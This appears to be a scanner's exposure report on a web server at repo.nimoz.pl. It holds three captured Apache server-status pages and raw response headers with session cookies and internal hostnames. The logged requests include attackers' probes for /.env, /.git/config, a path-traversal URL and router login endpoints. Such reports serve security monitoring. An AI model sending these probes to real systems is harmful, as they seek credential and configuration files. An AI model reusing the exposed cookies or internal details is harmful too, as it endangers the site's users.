0.00161005031662980.00.003017.16 185.172.32.7http/1.1 0-38-0/0/182. 0.0016100532582940.00.001.45 185.242.226.10http/1.1repo.nimoz.pl:443GET / HTTP/1.1 0-38-0/0/172. 0.0016100504630390.00.00362.26 185.242.226.10http/1.1vm-repo-prd.nimoz.local:80GET / HTTP/1.1 0-38-0/0/191. 0.00161005023209190.00.0037038.09 185.191.126.213http/1.1vm-repo-prd.nimoz.local:80GET / HTTP/1.1 0-38-0/0/119. 0.0016100503833270.00.00346.02 185.242.226.10http/1.1vm-repo-prd.nimoz.local:80GET /core/img/favicon.ico HTTP/1.1 0-38-0/0/189. 0.001610052820697540.00.0057283.34 65.75.195.25http/1.1repo.nimoz.pl:443GET /dns-query?dns=AAABAAABAAAAAAAAA3d3dwdleGFtcGxlA2NvbQAAAQAB 0-38-0/0/163. 0.0016100501156220.00.0058.94 164.52.0.93h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-38-0/0/157. 0.00161005028012260.00.001466.24 95.130.62.147http/1.1 0-38-0/0/132. 0.001610050886770.00.0059.53 185.191.126.213http/1.1vm-repo-prd.nimoz.local:80GET / HTTP/1.1 0-38-0/0/125. 0.0016100506179870.00.00478.74 146.19.24.28http/1.1vm-repo-prd.nimoz.local:80GET / HTTP/1.1 0-38-0/0/123. 0.0016100501721190.00.00255.47 165.84.142.83http/1.1repo.nimoz.pl:443GET / HTTP/1.0 0-38-0/0/196. 0.00161005048146440.00.002661.54 185.242.226.10http/1.1 0-38-0/0/398. 0.00161005013867380.00.007254.51 185.242.226.10http/1.1 0-38-0/0/164. 0.00161005014737870.00.00133759.34 74.101.125.2http/1.1vm-repo-prd.nimoz.local:80GET / HTTP/1.1 0-38-0/0/127. 0.0016100502476800.00.00345.91 213.134.162.80h2idle, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-38-0/0/131. 0.00161005018411770.00.00112514.45 107.170.208.38http/1.1vm-repo-prd.nimoz.local:80MGLNDD_148.81.110.91_80\n 0-38-0/0/109. 0.0016100505735910.00.0063850.69 185.172.32.7http/1.1vm-repo-prd.nimoz.local:80GET / HTTP/1.1 0-38-0/0/182. 0.00161005025196150.00.002797.74 172.104.238.162http/1.1 1-38-0/0/61. 0.0016100525109320.00.000.31 164.52.0.93http/1.1 1-38-0/0/36. 0.00161005029660.00.000.18 164.52.0.93h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-38-0/0/34. 0.00161005061290.00.000.16 164.52.0.93h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-38-0/0/65. 0.001610050162370.00.000.91 152.32.249.95http/1.1repo.nimoz.pl:443GET /robots.txt HTTP/1.1 1-38-0/0/40. 0.001610050107670.00.000.42 152.32.249.95http/1.1vm-repo-prd.nimoz.local:80GET /core/img/favicon.ico HTTP/1.1 1-38-0/0/53. 0.0016100502812930.00.000.60 164.52.0.93http/1.1repo.nimoz.pl:443GET / HTTP/1.0 1-38-0/0/35. 0.00161005052290.00.000.23 173.255.250.5http/1.1vm-repo-prd.nimoz.local:80GET /db/phpmyadmin4/index.php?lang=en HTTP/1.1 1-38-0/0/38. 0.00161005026430.00.000.15 152.32.249.95http/1.1vm-repo-prd.nimoz.local:80GET / HTTP/1.1 1-38-0/0/36. 0.0016100503585950.00.00344.49 164.52.0.93http/1.1repo.nimoz.pl:443GET / HTTP/1.0 1-38-0/0/42. 0.00161005099190.00.000.36 159.223.212.224http/1.1 1-38-0/0/34. 0.001610052634550.00.000.14 185.180.143.136http/1.1repo.nimoz.pl:443GET /cgi-bin/authLogin.cgi HTTP/1.1 1-38-0/0/31. 0.001610050561520.00.0057.60 212.102.40.218http/1.1 1-38-0/0/61. 0.001610052894870.00.001.39 212.102.40.218h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-38-0/0/39. 0.00161005054880.00.000.14 64.62.197.190h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-38-0/0/38. 0.0016100503478770.00.00344.61 104.250.50.118http/1.1 1-38-0/0/36. 0.00161005038500.00.000.16 162.243.139.35h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-38-0/0/50. 0.001610050234320.00.000.27 173.255.250.5h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-38-0/0/70. 0.0016100507954260.00.00894.98 185.242.226.10http/1.1 1-38-0/0/36. 0.00161005014190.00.000.16 185.242.226.10http/1.1 1-38-0/0/38. 0.00161005061320.00.000.23 185.242.226.10http/1.1repo.nimoz.pl:443GET /core/img/favicon-touch.png HTTP/1.1 1-38-0/0/57. 0.0016100504681850.00.00425.24 185.242.226.10http/1.1vm-repo-prd.nimoz.local:80GET /core/img/favicon-touch.png HTTP/1.1 1-38-0/0/91. 0.00161005041195150.00.002036.68 185.242.226.10http/1.1 1-38-0/0/36. 0.00161005130010.00.000.16 185.242.226.10http/1.1repo.nimoz.pl:443GET /core/img/favicon.ico HTTP/1.1 1-38-0/0/164. 0.00161005021733250.00.002824.89 165.84.142.83http/1.1 1-38-0/0/56. 0.001610050568690.00.0071.36 164.52.0.93h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 2-40106720/4/387_ 0.800017730090.00.02897.70 159.65.58.104h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 2-40106720/6/369_ 1.0702217560890.00.082155.62 159.65.58.104http/1.1repo.nimoz.pl:443GET /about HTTP/1.1 2-40106720/8/252_ 0.871273898500.00.54267.99
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31b23fe448b23fe448f8bc8d1b
Apache Status Apache Server Status for 148.81.110.91 (via 10.3.10.10) Server Version: Apache/2.4.38 (Debian) OpenSSL/1.1.1d Server MPM: event Server Built: 2021-06-10T10:13:06 Current Time: Friday, 16-Feb-2024 04:10:48 CET Restart Time: Friday, 26-Jan-2024 09:06:02 CET Parent Server Config. Generation: 22 Parent Server MPM Generation: 21 Server uptime: 20 days 19 hours 4 minutes 45 seconds Server load: 0.00 0.00 0.00 Total accesses: 11261 - Total Traffic: 635.0 GB - Total Duration: 94361427 CPU Usage: u10.05 s22.19 cu633.25 cs543.51 - .0673% CPU load .00627 requests/sec - 370.6 kB/second - 57.7 MB/request - 8379.49 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 217327no0yes124000 317328no0yes025000 Sum200 149000 .................................................._____________W ____________________________________............................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-18-0/0/63. 0.001878400233250.00.000.56 198.199.98.79http/1.1vm-repo-prd.nimoz.local:80GET /actuator/health HTTP/1.1 0-18-0/0/101. 0.001878400785220.00.001.65 198.199.98.79http/1.1 0-18-0/0/123. 0.00187840077976770.00.00132863.73 93.174.95.106h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-18-0/0/1075. 0.0018784025189160790.00.0024802.30 192.241.229.34http/1.1vm-repo-prd.nimoz.local:80MGLNDD_148.81.110.91_80\n 0-18-0/0/78. 0.0018784008118140.00.001371.90 198.235.24.171http/1.1vm-repo-prd.nimoz.local:80GET / HTTP/1.0 0-18-0/0/86. 0.001878402041040250.00.002230.28 93.174.95.106http/1.1 0-18-0/0/56. 0.0018784005222350.00.0034589.88 149.34.245.36http/1.1 0-18-0/0/136. 0.00187840031656530.00.003016.78 149.34.245.36http/1.1vm-repo-prd.nimoz.local:80HEAD /.env HTTP/1.1 0-18-0/0/129. 0.001878400579650.00.001.25 128.199.159.71http/1.1 0-18-0/0/101. 0.00187840274626160.00.00361.97 64.225.60.187http/1.1 0-18-0/0/131. 0.00187840023203550.00.0037037.80 192.241.202.77http/1.1vm-repo-prd.nimoz.local:80GET /actuator/health HTTP/1.1 0-18-0/0/63. 0.00187840243829570.00.00345.78 192.241.202.77http/1.1 0-18-0/0/132. 0.00187840020693770.00.0057283.07 172.234.96.249http/1.1vm-repo-prd.nimoz.local:80GET /sy.php HTTP/1.1 0-18-0/0/97. 0.0018784001151950.00.0058.67 172.234.96.249http/1.1 0-18-0/0/105. 0.00187840028007970.00.001465.96 94.102.61.80http/1.1vm-repo-prd.nimoz.local:80GET / HTTP/1.1 0-18-0/0/67. 0.0018784019879880.00.0059.17 94.102.61.80http/1.1 0-18-0/0/71. 0.0018784016174370.00.00478.46 93.174.95.106http/1.1 0-18-0/0/64. 0.00187840311715000.00.00255.15 185.180.143.48http/1.1repo.nimoz.pl:443GET / HTTP/1.1 0-18-0/0/144. 0.001878403148141070.00.002661.33 194.187.176.55http/1.1repo.nimoz.pl:443GET /api/v1/totp/user-backup-code/../../system/system-informati 0-18-0/0/339. 0.00187840013862940.00.007254.27 93.174.95.106http/1.1 0-18-0/0/106. 0.001878403114732990.00.00133759.05 192.241.210.81http/1.1repo.nimoz.pl:443GET /actuator/health HTTP/1.1 0-18-0/0/67. 0.0018784002472540.00.00345.65 146.19.24.28http/1.1vm-repo-prd.nimoz.local:80GET / HTTP/1.1 0-18-0/0/80. 0.001878402618408480.00.00112514.26 93.174.95.106h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-18-0/0/57. 0.0018784005733370.00.0063850.53 192.241.208.49http/1.1repo.nimoz.pl:443GET / HTTP/1.0 0-18-0/0/128. 0.001878402525193160.00.002797.54 45.236.116.198http/1.1 1-18-0/0/40. 0.001878400108300.00.000.25 93.174.95.106http/1.1vm-repo-prd.nimoz.local:80GET /robots.txt HTTP/1.1 1-18-0/0/10. 0.00187840028500.00.000.05 3.120.140.67http/1.1 1-18-0/0/9. 0.001878402559850.00.000.10 3.238.68.177http/1.1 1-18-0/0/37. 0.0018784017161210.00.000.82 52.221.233.79http/1.1repo.nimoz.pl:443GET /index.php/js/core/merged-template-prepend.js HTTP/1.1 1-18-0/0/14. 0.0018784024105460.00.000.32 52.221.233.79http/1.1repo.nimoz.pl:443GET /core/img/manifest.js HTTP/1.1 1-18-0/0/30. 0.0018784002811050.00.000.53 31.220.3.140http/1.1 1-18-0/0/9. 0.00187840050140.00.000.13 31.220.3.140http/1.1vm-repo-prd.nimoz.local:80POST /HNAP1/ HTTP/1.1 1-18-0/0/9. 0.00187840024510.00.000.05 149.34.245.36http/1.1 1-18-0/0/12. 0.0018784003583490.00.00344.39 167.99.37.119http/1.1vm-repo-prd.nimoz.local:80\x16\x03\x01 1-18-0/0/17. 0.001878402797850.00.000.27 94.102.61.80http/1.1repo.nimoz.pl:443GET / HTTP/1.1 1-18-0/0/8. 0.00187840033250.00.000.07 93.174.95.106http/1.1 1-18-0/0/9. 0.0018784027560620.00.0057.53 93.174.95.106http/1.1 1-18-0/0/39. 0.001878402492870.00.000.87 94.102.61.80http/1.1repo.nimoz.pl:443GET / HTTP/1.1 1-18-0/0/16. 0.00187840053880.00.000.06 185.142.236.43http/1.1vm-repo-prd.nimoz.local:80GET /.well-known/security.txt HTTP/1.1 1-18-0/0/12. 0.0018784003477800.00.00344.52 93.174.95.106http/1.1repo.nimoz.pl:443GET /core/img/favicon.ico HTTP/1.1 1-18-0/0/9. 0.001878402237210.00.000.07 31.220.3.140http/1.1 1-18-0/0/25. 0.0018784033233240.00.000.17 93.174.95.106http/1.1repo.nimoz.pl:443GET /sitemap.xml HTTP/1.1 1-18-0/0/40. 0.00187840287952910.00.00894.80 93.174.95.106http/1.1repo.nimoz.pl:443\n 1-18-0/0/9. 0.001878402212890.00.000.06 93.174.95.106http/1.1 1-18-0/0/11. 0.00187840060570.00.000.17 93.174.95.106http/1.1 1-18-0/0/30. 0.0018784004680350.00.00425.12 93.174.95.106h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-18-0/0/64. 0.001878401841193310.00.002036.57 93.174.95.106http/1.1 1-18-0/0/9. 0.00187840029450.00.000.05 93.174.95.106http/1.1 1-18-0/0/140. 0.001878402321732350.00.002824.83 165.84.142.83http/1.1 1-18-0/0/31. 0.0018784028561360.00.0070.80 93.174.95.106h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 2-21173270/18/291_ 0.141131017725220.00.01897.38 80.78.27.100http/1.1vm-repo-prd.nimoz.local:80\x16\x03\x01\x02 2-21173270/4/261_ 0.28832017554890.00.032155.21 185.224.128.55http/1.1vm-repo-prd.nimoz.local:80GET / HTTP/1.1 2-21173270/1/158_ 0.28113103889460.00.00267.21 80.78.27.100http/1.1vm-repo-prd.nimoz.local:80GET / HTTP/1.0 2-21173270/2/153_ 0.36023780480.00.014.10
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31b23fe448b23fe4489ee62251
Apache Status Apache Server Status for 148.81.110.91 (via 10.3.10.10) Server Version: Apache/2.4.38 (Debian) OpenSSL/1.1.1d Server MPM: event Server Built: 2021-06-10T10:13:06 Current Time: Thursday, 01-Feb-2024 18:15:30 CET Restart Time: Friday, 26-Jan-2024 09:06:02 CET Parent Server Config. Generation: 7 Parent Server MPM Generation: 6 Server uptime: 6 days 9 hours 9 minutes 28 seconds Server load: 0.00 0.00 0.00 Total accesses: 8939 - Total Traffic: 632.6 GB - Total Duration: 93960696 CPU Usage: u3.9 s6.76 cu607.92 cs540.21 - .21% CPU load .0162 requests/sec - 1.2 MB/second - 72.5 MB/request - 10511.3 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 22838no0yes124000 32839no0yes025000 Sum200 149000 ..................................................______________ ___W________________________________............................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-2-0/0/51. 0.0032492329231010.00.000.43 104.131.66.157http/1.1 0-2-0/0/88. 0.003249230784310.00.001.60 185.134.22.149http/1.1vm-repo-prd.nimoz.local:80\x16\x03\x01 0-2-0/0/113. 0.00324923077975620.00.00132863.63 92.220.95.210http/1.1 0-2-0/0/1063. 0.003249230189152020.00.0024801.76 198.20.69.98http/1.1 0-2-0/0/62. 0.00324923398116050.00.001371.79 198.20.69.98http/1.1 0-2-0/0/72. 0.003249239641038230.00.002230.17 92.220.95.210http/1.1repo.nimoz.pl:443GET / HTTP/1.0 0-2-0/0/47. 0.0032492305221200.00.0034589.82 198.20.69.98http/1.1 0-2-0/0/123. 0.00324923121531655100.00.003016.70 104.248.30.93h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-2-0/0/114. 0.003249233214578450.00.001.18 90.138.212.160http/1.1repo.nimoz.pl:443GET / HTTP/1.0 0-2-0/0/88. 0.0032492304624210.00.00361.86 198.235.24.203http/1.1vm-repo-prd.nimoz.local:80GET / HTTP/1.0 0-2-0/0/118. 0.00324923023202160.00.0037037.72 103.186.67.227http/1.1 0-2-0/0/53. 0.003249233613828190.00.00345.70 104.248.30.93h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-2-0/0/118. 0.00324923020692800.00.0057283.00 198.20.69.98http/1.1vm-repo-prd.nimoz.local:80GET / HTTP/1.1 0-2-0/0/82. 0.0032492301150190.00.0058.56 103.186.67.227http/1.1vm-repo-prd.nimoz.local:80POST /boaform/admin/formLogin HTTP/1.1 0-2-0/0/91. 0.003249232728006430.00.001465.83 185.134.22.149http/1.1vm-repo-prd.nimoz.local:80\x16\x03\x01 0-2-0/0/52. 0.003249230877700.00.0059.02 84.54.51.254http/1.1vm-repo-prd.nimoz.local:80GET / HTTP/1.1 0-2-0/0/61. 0.00324923986173100.00.00478.38 167.99.13.19http/1.1 0-2-0/0/49. 0.0032492301707660.00.00254.55 198.20.69.98http/1.1vm-repo-prd.nimoz.local:80GET /.well-known/security.txt HTTP/1.1 0-2-0/0/128. 0.00324923048131870.00.002661.23 146.19.24.23http/1.1vm-repo-prd.nimoz.local:80GET / HTTP/1.1 0-2-0/0/328. 0.0032492354913861800.00.007254.21 192.241.225.56http/1.1repo.nimoz.pl:443GET / HTTP/1.0 0-2-0/0/96. 0.00324923014731530.00.00133758.95 104.131.66.157http/1.1vm-repo-prd.nimoz.local:80GET /.git/config HTTP/1.1 0-2-0/0/56. 0.0032492302470940.00.00345.55 104.248.30.93http/1.1done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-2-0/0/71. 0.003249237518406470.00.00112514.15 192.241.192.55http/1.1 0-2-0/0/45. 0.003249231976545731650.00.0063850.43 93.105.176.79h2repo.nimoz.pl:443GET /index.php/s/E68CQz2ETFFfHXs/download?path=%2FDANE%2FMMTy_n 0-2-0/0/115. 0.00324923025191610.00.002796.98 198.20.69.98http/1.1vm-repo-prd.nimoz.local:80GET /robots.txt HTTP/1.1 1-2-0/0/37. 0.0032492326108300.00.000.25 185.134.22.149http/1.1 1-2-0/0/9. 0.00324923028500.00.000.05 185.134.22.149http/1.1vm-repo-prd.nimoz.local:80GET /Ep1v HTTP/1.1 1-2-0/0/9. 0.003249232559850.00.000.10 185.134.22.149http/1.1 1-2-0/0/32. 0.003249230160390.00.000.76 185.134.22.149http/1.1vm-repo-prd.nimoz.local:80GET /systembc/password.php HTTP/1.1 1-2-0/0/12. 0.00324923521104930.00.000.29 89.250.193.161h2repo.nimoz.pl:443idle, streams: 0/3/3/0/0 (open/recv/resp/push/rst) 1-2-0/0/27. 0.003249238622810600.00.000.50 185.134.22.149http/1.1vm-repo-prd.nimoz.local:80\x16\x03\x01 1-2-0/0/7. 0.003249231649870.00.000.11 90.138.212.160http/1.1 1-2-0/0/9. 0.00324923024510.00.000.05 198.20.69.98http/1.1vm-repo-prd.nimoz.local:80GET /sitemap.xml HTTP/1.1 1-2-0/0/11. 0.00324923723583490.00.00344.39 18.232.104.89http/1.1repo.nimoz.pl:443GET /99vt HTTP/1.1 1-2-0/0/14. 0.00324923097270.00.000.23 198.20.69.98http/1.1vm-repo-prd.nimoz.local:80GET /favicon.ico HTTP/1.1 1-2-0/0/5. 0.003249232432780.00.000.04 198.20.69.98http/1.1 1-2-0/0/9. 0.0032492327560620.00.0057.53 198.20.69.98http/1.1 1-2-0/0/36. 0.003249233292620.00.000.85 104.131.66.157http/1.1repo.nimoz.pl:443GET /.git/config HTTP/1.1 1-2-0/0/12. 0.003249231953860.00.000.05 43.153.174.38http/1.1repo.nimoz.pl:443GET /c/msdownload/update/software/update/2021/11/6632de33-96744 1-2-0/0/10. 0.00324923223477500.00.00344.50 18.232.104.89http/1.1repo.nimoz.pl:443GET /99vu HTTP/1.1 1-2-0/0/8. 0.003249232436980.00.000.06 43.153.174.38http/1.1repo.nimoz.pl:443GET /fw6I HTTP/1.1 1-2-0/0/23. 0.0032492327232910.00.000.16 54.93.208.222http/1.1 1-2-0/0/38. 0.00324923267952390.00.00894.77 3.91.100.237http/1.1 1-2-0/0/7. 0.003249237312440.00.000.03 3.91.100.237http/1.1 1-2-0/0/9. 0.003249232160570.00.000.17 3.91.100.237http/1.1 1-2-0/0/28. 0.0032492317724680130.00.00425.10 43.153.174.38h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-2-0/0/61. 0.003249232641193120.00.002036.55 104.248.30.93http/1.1repo.nimoz.pl:443GET / HTTP/1.1 1-2-0/0/8. 0.003249232529450.00.000.05 104.248.30.93h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-2-0/0/138. 0.003249232928521732120.00.002824.82 104.248.30.93http/1.1 1-2-0/0/28. 0.0032492324560840.00.0070.76 162.216.149.176http/1.1 2-628380/3/220_ 0.6212117693370.00.11897.06 138.68.163.10h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 2-628380/2/201_ 0.4212617549000.00.032154.89 138.68.163.10http/1.1 2-628380/2/103_ 0.41103878890.00.01266.77 138.68.163.10http/1.1 2-628380/2/104_ 0.541412</
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31b23fe448b23fe448b4429ab7
Apache Status Apache Server Status for 148.81.110.91 (via 10.3.10.10) Server Version: Apache/2.4.38 (Debian) OpenSSL/1.1.1d Server MPM: event Server Built: 2021-06-10T10:13:06 Current Time: Friday, 26-Jan-2024 01:00:19 CET Restart Time: Wednesday, 10-Jan-2024 13:04:30 CET Parent Server Config. Generation: 17 Parent Server MPM Generation: 16 Server uptime: 15 days 11 hours 55 minutes 48 seconds Server load: 0.08 0.02 0.01 Total accesses: 30846 - Total Traffic: 536.5 GB - Total Duration: 230899481 CPU Usage: u7.61 s16.92 cu1143.46 cs895 - .154% CPU load .023 requests/sec - 420.1 kB/second - 17.8 MB/request - 7485.56 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 228414no0yes124000 328415no0yes025000 Sum200 149000 ..................................................______________ ______W_____________________________............................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-12-0/0/275. 0.002628112710660100.00.00560.33 185.180.143.72http/1.1repo.nimoz.pl:443GET / HTTP/1.1 0-12-0/0/260. 0.00262811267380270.00.001102.58 8.222.253.90http/1.1repo.nimoz.pl:443GET /dns-query?dns=PTIBAAABAAAAAAAABmdvb2dsZQNjb20AAAEAAQ HTTP/ 0-12-0/0/164. 0.00262811258907480.00.00506.05 71.6.232.22http/1.1repo.nimoz.pl:443GET / HTTP/1.1 0-12-0/0/1204. 0.002628111990461320.00.0014375.56 172.235.29.35http/1.1 0-12-0/0/128. 0.0026281101505510.00.0017.33 103.67.163.199http/1.1 0-12-0/0/147. 0.0026281104058530.00.00568.56 83.142.127.11h2idle, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-12-0/0/174. 0.00262811010847610.00.00787.18 89.190.156.234http/1.1vm-repo-prd.nimoz.local:80GET / HTTP/1.1 0-12-0/0/184. 0.00262811267711630.00.00633.28 102.131.60.136http/1.1repo.nimoz.pl:443GET / HTTP/1.0 0-12-0/0/198. 0.00262811874176110.00.001166.33 8.222.253.90http/1.1repo.nimoz.pl:443POST /dns-query HTTP/1.1 0-12-0/0/224. 0.00262811307231920.00.001128.77 162.243.131.24http/1.1repo.nimoz.pl:443GET /version HTTP/1.1 0-12-0/0/199. 0.002628111917966450.00.00999.93 172.235.29.35h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-12-0/0/934. 0.00262811018024770.00.0011253.70 146.19.24.23http/1.1vm-repo-prd.nimoz.local:80GET / HTTP/1.1 0-12-0/0/464. 0.0026281109927890.00.003645.95 198.199.102.108http/1.1vm-repo-prd.nimoz.local:80MGLNDD_148.81.110.91_80\n 0-12-0/0/470. 0.002628112024182500.00.002441.08 194.55.186.155http/1.1 0-12-0/0/191. 0.00262811246513310.00.001001.96 194.55.186.155http/1.1repo.nimoz.pl:443GET //cms/wp-includes/wlwmanifest.xml HTTP/1.1 0-12-0/0/140. 0.00262811203633660.00.00758.74 198.199.111.152http/1.1 0-12-0/0/171. 0.0026281107548420.00.00624.63 172.235.29.35h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-12-0/0/246. 0.00262811255110830.00.001425.53 198.199.108.4http/1.1 0-12-0/0/142. 0.0026281104664720.00.00382.42 172.235.29.35http/1.1 0-12-0/0/121. 0.0026281102378690.00.0041.70 146.19.24.23http/1.1vm-repo-prd.nimoz.local:80GET / HTTP/1.1 0-12-0/0/188. 0.00262811217301850.00.00791.45 165.22.98.127http/1.1 0-12-0/0/185. 0.00262811022442210.00.00610.98 103.67.163.199http/1.1vm-repo-prd.nimoz.local:80GET /.env HTTP/1.1 0-12-0/0/170. 0.00262811191805360.00.00297.43 172.235.29.35h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-12-0/0/160. 0.0026281103481060.00.00563.59 146.19.24.23http/1.1vm-repo-prd.nimoz.local:80GET / HTTP/1.1 0-12-0/0/827. 0.00262811062428950.00.006496.84 146.19.24.23http/1.1vm-repo-prd.nimoz.local:80GET / HTTP/1.1 1-12-0/0/24. 0.0026281119163090.00.000.35 194.55.186.155http/1.1repo.nimoz.pl:443GET //test/wp-includes/wlwmanifest.xml HTTP/1.1 1-12-0/0/20. 0.002628111998900.00.000.37 45.156.128.7http/1.1repo.nimoz.pl:443GET / HTTP/1.1 1-12-0/0/17. 0.002628111875330.00.000.31 91.92.249.130http/1.1repo.nimoz.pl:443GET /+CSCOE+/logon.html HTTP/1.1 1-12-0/0/36. 0.002628112487390.00.000.35 194.55.186.155http/1.1repo.nimoz.pl:443GET / HTTP/1.1 1-12-0/0/20. 0.002628110145390.00.000.30 201.191.123.197http/1.1 1-12-0/0/25. 0.00262811058400.00.000.33 194.187.176.227http/1.1repo.nimoz.pl:443GET / HTTP/1.0 1-12-0/0/41. 0.00262811243675300.00.00145.29 45.156.128.7http/1.1repo.nimoz.pl:443GET / HTTP/1.1 1-12-0/0/22. 0.002628111947320.00.000.33 194.55.186.155http/1.1repo.nimoz.pl:443GET //website/wp-includes/wlwmanifest.xml HTTP/1.1 1-12-0/0/50. 0.002628110572980.00.001.07 194.55.186.155http/1.1repo.nimoz.pl:443GET //xmlrpc.php?rsd HTTP/1.1 1-12-0/0/21. 0.0026281123122720.00.000.30 45.156.128.7http/1.1repo.nimoz.pl:443GET /api/session/properties HTTP/1.1 1-12-0/0/27. 0.0026281119165610.00.000.30 194.55.186.155http/1.1repo.nimoz.pl:443GET //sito/wp-includes/wlwmanifest.xml HTTP/1.1 1-12-0/0/27. 0.0026281117260530.00.000.74 194.55.186.155http/1.1repo.nimoz.pl:443GET / HTTP/1.1 1-12-0/0/18. 0.0026281119568370.00.000.39 45.156.128.7http/1.1repo.nimoz.pl:443GET /favicon/favicon.ico HTTP/1.1 1-12-0/0/17. 0.00262811095570.00.000.26 212.102.40.218http/1.1 1-12-0/0/48. 0.00262811201765750.00.00128.46 194.55.186.155http/1.1repo.nimoz.pl:443GET //web/wp-includes/wlwmanifest.xml HTTP/1.1 1-12-0/0/26. 0.0026281126152870.00.000.33 194.55.186.155http/1.1repo.nimoz.pl:443GET //sito/wp-includes/wlwmanifest.xml HTTP/1.1 1-12-0/0/28. 0.002628110339950.00.000.89 185.134.22.149http/1.1vm-repo-prd.nimoz.local:80\x16\x03\x01 1-12-0/0/21. 0.002628110140470.00.000.36 20.1.198.110http/1.1vm-repo-prd.nimoz.local:80POST / HTTP/1.1 1-12-0/0/27. 0.002628111964930.00.000.42 194.55.186.155http/1.1repo.nimoz.pl:443GET //news/wp-includes/wlwmanifest.xml HTTP/1.1 1-12-0/0/19. 0.002628116576010.00.000.28 20.1.198.110http/1.1repo.nimoz.pl:443POST / HTTP/1.1 1-12-0/0/39. 0.0026281123503100.00.000.61 194.55.186.155http/1.1repo.nimoz.pl:443GET / HTTP/1.1 1-12-0/0/21. 0.0026281122143340.00.000.39 194.55.186.155http/1.1repo.nimoz.pl:443GET //site/wp-includes/wlwmanifest.xml HTTP/1.1 1-12-0/0/1182. 0.0026281124121324410.00.0012151.75 45.156.128.7http/1.1repo.nimoz.pl:443GET / HTTP/1.1 1-12-0/0/20. 0.0026281120106130.00.000.32 45.156.128.7http/1.1repo.nimoz.pl:443GET /sugar_version.json HTTP/1.1 1-12-0/0/41. 0.0026281125115480.00.001.56 172.235.29.35http/1.1 2-16284140/0/1461_ 0.00338521103584400.00.0014134.16 64.225.60.187http/1.1 2-16284140/0/680_ 0.0010310913096400.00.00<
Open service 148.81.110.91:443
2024-10-31 23:40
HTTP/1.1 400 Bad Request Date: Thu, 31 Oct 2024 23:40:30 GMT Server: Apache Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Content-Security-Policy: default-src 'self'; script-src 'self' 'nonce-Z05nSHZ2ZUhLN1BvZmkwcEFZZ2hSNEJvQVdUaEVEZkZFdXRoWkFPVjZHTT06NU9oT3pNKzBHdVc0TXg5ZVJjdFpLdkFsTGhXSktWQ09Kb0JUVkhibm1oaz0='; style-src 'self' 'unsafe-inline'; frame-src *; img-src * data: blob:; font-src 'self' data:; media-src *; connect-src *; object-src 'none'; base-uri 'self'; Set-Cookie: oc_sessionPassphrase=5HoIew802%2FEfubjwo70tKhuj47qBssrUWyr%2Ft5QdNYrGqv0o3%2Fo2yeMq%2B%2FsCoF9PH7QS8A3o10w%2FfKF%2Fqu2m6Xk9jCGiHYh9druPBBizyfzCt3AfsdFHLYXSOM%2FCLtDN; path=/; secure; HttpOnly; SameSite=Lax Set-Cookie: oc1vb1y7u9rx=vrd9e0mbnf00107sdi2jiv5r8h; path=/; secure; HttpOnly; SameSite=Lax Set-Cookie: __Host-nc_sameSiteCookielax=true; path=/; httponly;secure; expires=Fri, 31-Dec-2100 23:59:59 GMT; SameSite=lax Set-Cookie: __Host-nc_sameSiteCookiestrict=true; path=/; httponly;secure; expires=Fri, 31-Dec-2100 23:59:59 GMT; SameSite=strict Referrer-Policy: no-referrer X-Content-Type-Options: nosniff X-Download-Options: noopen X-Frame-Options: SAMEORIGIN X-Permitted-Cross-Domain-Policies: none X-Robots-Tag: none X-XSS-Protection: 1; mode=block Upgrade: h2 Connection: Upgrade, close Strict-Transport-Security: 